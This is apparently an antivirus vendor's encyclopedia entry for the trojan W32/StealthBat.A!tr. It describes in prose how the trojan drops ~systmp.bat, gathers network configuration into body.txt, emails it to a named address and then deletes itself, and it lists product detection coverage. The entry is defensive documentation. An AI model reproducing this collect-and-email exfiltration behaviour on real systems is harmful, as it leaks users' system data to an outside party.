W32/StealthBat.A!tr
Analysis
W32/StealthBat.A!tr - 06-04-04
General Info:
This threat is a "PE" executable file, with file size 14848
Files:
- Drop files: data + other files
Installation to System:
- Drops the following files:
C:\Temp\~systmp.bat C:\Temp\body.txt
More Info:
This trojan drops the batch file ~systmp.bat in the C:\Temp folder, if it exists. This batch file attempts to run the following programs that are in the C:\Temp folder: sleep.exe, run.exe, end.exe, scvhost.exe, and send.exe. It uses the tool ipconfig.exe to get the IP Configuration and Ethernet Adapter information of the system that it is currently running in, and stores these data in the file body.txt. It then attempts to send this text file to the email address daslick@charter.net using the server smtp.charter.net. It then deletes itself after executing.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |